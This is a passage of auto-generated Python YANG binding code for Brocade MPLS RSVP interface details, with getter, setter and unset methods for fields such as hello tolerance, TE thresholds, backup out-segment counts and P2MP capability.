self.__mpls_rsvp_interface_hello_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-interval", rest_name="mpls-rsvp-interface-hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_hello_tolerance(self):
"""
Getter method for mpls_rsvp_interface_hello_tolerance, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_tolerance (uint32)
YANG Description: RSVP Hello tolerance for the RSVP Interface
"""
return self.__mpls_rsvp_interface_hello_tolerance
def _set_mpls_rsvp_interface_hello_tolerance(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_hello_tolerance, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_tolerance (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_hello_tolerance is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_hello_tolerance() directly.
YANG Description: RSVP Hello tolerance for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-tolerance", rest_name="mpls-rsvp-interface-hello-tolerance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_hello_tolerance must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-tolerance", rest_name="mpls-rsvp-interface-hello-tolerance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_hello_tolerance = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_hello_tolerance(self):
self.__mpls_rsvp_interface_hello_tolerance = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-tolerance", rest_name="mpls-rsvp-interface-hello-tolerance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_hello_status(self):
"""
Getter method for mpls_rsvp_interface_hello_status, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_status (string)
YANG Description: RSVP Hello status for the RSVP Interface
"""
return self.__mpls_rsvp_interface_hello_status
def _set_mpls_rsvp_interface_hello_status(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_hello_status, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_status (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_hello_status is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_hello_status() directly.
YANG Description: RSVP Hello status for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-hello-status", rest_name="mpls-rsvp-interface-hello-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_hello_status must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-hello-status", rest_name="mpls-rsvp-interface-hello-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_hello_status = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_hello_status(self):
self.__mpls_rsvp_interface_hello_status = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-hello-status", rest_name="mpls-rsvp-interface-hello-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_rsvp_interface_te_up_thresholds(self):
"""
Getter method for mpls_rsvp_interface_te_up_thresholds, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_te_up_thresholds (uint32)
YANG Description: MPLS TE flooding UP thresholds in use for the RSVP Interface
"""
return self.__mpls_rsvp_interface_te_up_thresholds
def _set_mpls_rsvp_interface_te_up_thresholds(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_te_up_thresholds, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_te_up_thresholds (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_te_up_thresholds is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_te_up_thresholds() directly.
YANG Description: MPLS TE flooding UP thresholds in use for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-up-thresholds", rest_name="mpls-rsvp-interface-te-up-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_te_up_thresholds must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-up-thresholds", rest_name="mpls-rsvp-interface-te-up-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_te_up_thresholds = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_te_up_thresholds(self):
self.__mpls_rsvp_interface_te_up_thresholds = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-up-thresholds", rest_name="mpls-rsvp-interface-te-up-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_te_down_thresholds(self):
"""
Getter method for mpls_rsvp_interface_te_down_thresholds, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_te_down_thresholds (uint32)
YANG Description: MPLS TE flooding DOWN thresholds in use for the RSVP Interface
"""
return self.__mpls_rsvp_interface_te_down_thresholds
def _set_mpls_rsvp_interface_te_down_thresholds(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_te_down_thresholds, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_te_down_thresholds (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_te_down_thresholds is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_te_down_thresholds() directly.
YANG Description: MPLS TE flooding DOWN thresholds in use for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-down-thresholds", rest_name="mpls-rsvp-interface-te-down-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_te_down_thresholds must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-down-thresholds", rest_name="mpls-rsvp-interface-te-down-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_te_down_thresholds = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_te_down_thresholds(self):
self.__mpls_rsvp_interface_te_down_thresholds = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-down-thresholds", rest_name="mpls-rsvp-interface-te-down-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_g_mpls_prot_statistics_pkt_types(self):
"""
Getter method for g_mpls_prot_statistics_pkt_types, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/g_mpls_prot_statistics_pkt_types (list)
YANG Description: Statistics for MPLS PROT packet types
"""
return self.__g_mpls_prot_statistics_pkt_types
def _set_g_mpls_prot_statistics_pkt_types(self, v, load=False):
"""
Setter method for g_mpls_prot_statistics_pkt_types, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/g_mpls_prot_statistics_pkt_types (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_g_mpls_prot_statistics_pkt_types is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_g_mpls_prot_statistics_pkt_types() directly.
YANG Description: Statistics for MPLS PROT packet types
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType(False,g_mpls_prot_statistics_pkt_types.g_mpls_prot_statistics_pkt_types, yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """g_mpls_prot_statistics_pkt_types must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_pkt_types.g_mpls_prot_statistics_pkt_types, yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)""",
})
self.__g_mpls_prot_statistics_pkt_types = t
if hasattr(self, '_set'):
self._set()
def _unset_g_mpls_prot_statistics_pkt_types(self):
self.__g_mpls_prot_statistics_pkt_types = YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_pkt_types.g_mpls_prot_statistics_pkt_types, yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
def _get_g_mpls_prot_statistics_errors(self):
"""
Getter method for g_mpls_prot_statistics_errors, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/g_mpls_prot_statistics_errors (list)
YANG Description: Error statistics for MPLS PROT control packets
"""
return self.__g_mpls_prot_statistics_errors
def _set_g_mpls_prot_statistics_errors(self, v, load=False):
"""
Setter method for g_mpls_prot_statistics_errors, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/g_mpls_prot_statistics_errors (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_g_mpls_prot_statistics_errors is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_g_mpls_prot_statistics_errors() directly.
YANG Description: Error statistics for MPLS PROT control packets
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType(False,g_mpls_prot_statistics_errors.g_mpls_prot_statistics_errors, yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """g_mpls_prot_statistics_errors must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_errors.g_mpls_prot_statistics_errors, yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)""",
})
self.__g_mpls_prot_statistics_errors = t
if hasattr(self, '_set'):
self._set()
def _unset_g_mpls_prot_statistics_errors(self):
self.__g_mpls_prot_statistics_errors = YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_errors.g_mpls_prot_statistics_errors, yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
def _get_mpls_rsvp_interface_active_backup_outsegs(self):
"""
Getter method for mpls_rsvp_interface_active_backup_outsegs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_active_backup_outsegs (uint32)
YANG Description: Number of Active backup Out Segments on the RSVP Interface
"""
return self.__mpls_rsvp_interface_active_backup_outsegs
def _set_mpls_rsvp_interface_active_backup_outsegs(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_active_backup_outsegs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_active_backup_outsegs (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_active_backup_outsegs is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_active_backup_outsegs() directly.
YANG Description: Number of Active backup Out Segments on the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-active-backup-outsegs", rest_name="mpls-rsvp-interface-active-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_active_backup_outsegs must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-active-backup-outsegs", rest_name="mpls-rsvp-interface-active-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_active_backup_outsegs = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_active_backup_outsegs(self):
self.__mpls_rsvp_interface_active_backup_outsegs = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-active-backup-outsegs", rest_name="mpls-rsvp-interface-active-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_inactive_backup_outsegs(self):
"""
Getter method for mpls_rsvp_interface_inactive_backup_outsegs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_inactive_backup_outsegs (uint32)
YANG Description: Number of Inactive backup Out Segments on the RSVP Interface
"""
return self.__mpls_rsvp_interface_inactive_backup_outsegs
def _set_mpls_rsvp_interface_inactive_backup_outsegs(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_inactive_backup_outsegs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_inactive_backup_outsegs (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_inactive_backup_outsegs is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_inactive_backup_outsegs() directly.
YANG Description: Number of Inactive backup Out Segments on the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-inactive-backup-outsegs", rest_name="mpls-rsvp-interface-inactive-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_inactive_backup_outsegs must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-inactive-backup-outsegs", rest_name="mpls-rsvp-interface-inactive-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_inactive_backup_outsegs = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_inactive_backup_outsegs(self):
self.__mpls_rsvp_interface_inactive_backup_outsegs = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-inactive-backup-outsegs", rest_name="mpls-rsvp-interface-inactive-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_duplicate_preempts_dropped(self):
"""
Getter method for mpls_rsvp_interface_duplicate_preempts_dropped, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_duplicate_preempts_dropped (uint32)
YANG Description: Number of Duplicate preempts dropped on the RSVP Interface
"""
return self.__mpls_rsvp_interface_duplicate_preempts_dropped
def _set_mpls_rsvp_interface_duplicate_preempts_dropped(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_duplicate_preempts_dropped, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_duplicate_preempts_dropped (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_duplicate_preempts_dropped is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_duplicate_preempts_dropped() directly.
YANG Description: Number of Duplicate preempts dropped on the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-duplicate-preempts-dropped", rest_name="mpls-rsvp-interface-duplicate-preempts-dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_duplicate_preempts_dropped must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-duplicate-preempts-dropped", rest_name="mpls-rsvp-interface-duplicate-preempts-dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_duplicate_preempts_dropped = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_duplicate_preempts_dropped(self):
self.__mpls_rsvp_interface_duplicate_preempts_dropped = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-duplicate-preempts-dropped", rest_name="mpls-rsvp-interface-duplicate-preempts-dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_p2mp_capability(self):
"""
Getter method for mpls_rsvp_interface_p2mp_capability, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_p2mp_capability (boolean)
YANG Description: P2MP capability of RSVP interface
"""
return self.__mpls_rsvp_interface_p2mp_capability
def _set_mpls_rsvp_interface_p2mp_capability(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_p2mp_capability, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_p2mp_capability (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_p2mp_capability is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_p2mp_capability() directly.
YANG Description: P2MP capability of RSVP interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-p2mp-capability", rest_name="mpls-rsvp-interface-p2mp-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_p2mp_capability must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-p2mp-capability", rest_name="mpls-rsvp-interface-p2mp-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__mpls_rsvp_interface_p2mp_capability = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_p2mp_capability(self):
self.__mpls_rsvp_interface_p2mp_capability = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-p2mp-capability", rest_name="mpls-rsvp-interface-p2mp-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_mpls_rsvp_interface_bypass_interface(self):
"""
Getter method for mpls_rsvp_interface_bypass_interface, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_interface (boolean)
YANG Description: Is RSVP interface a bypass interface
"""
return self.__mpls_rsvp_interface_bypass_interface
def _set_mpls_rsvp_interface_bypass_interface(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_bypass_interface, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_interface (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_bypass_interface is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_bypass_interface() directly.
YANG Description: Is RSVP interface a bypass interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-interface", rest_name="mpls-rsvp-interface-bypass-interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_bypass_interface must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-interface", rest_name="mpls-rsvp-interface-bypass-interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__mpls_rsvp_interface_bypass_interface = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_bypass_interface(self):
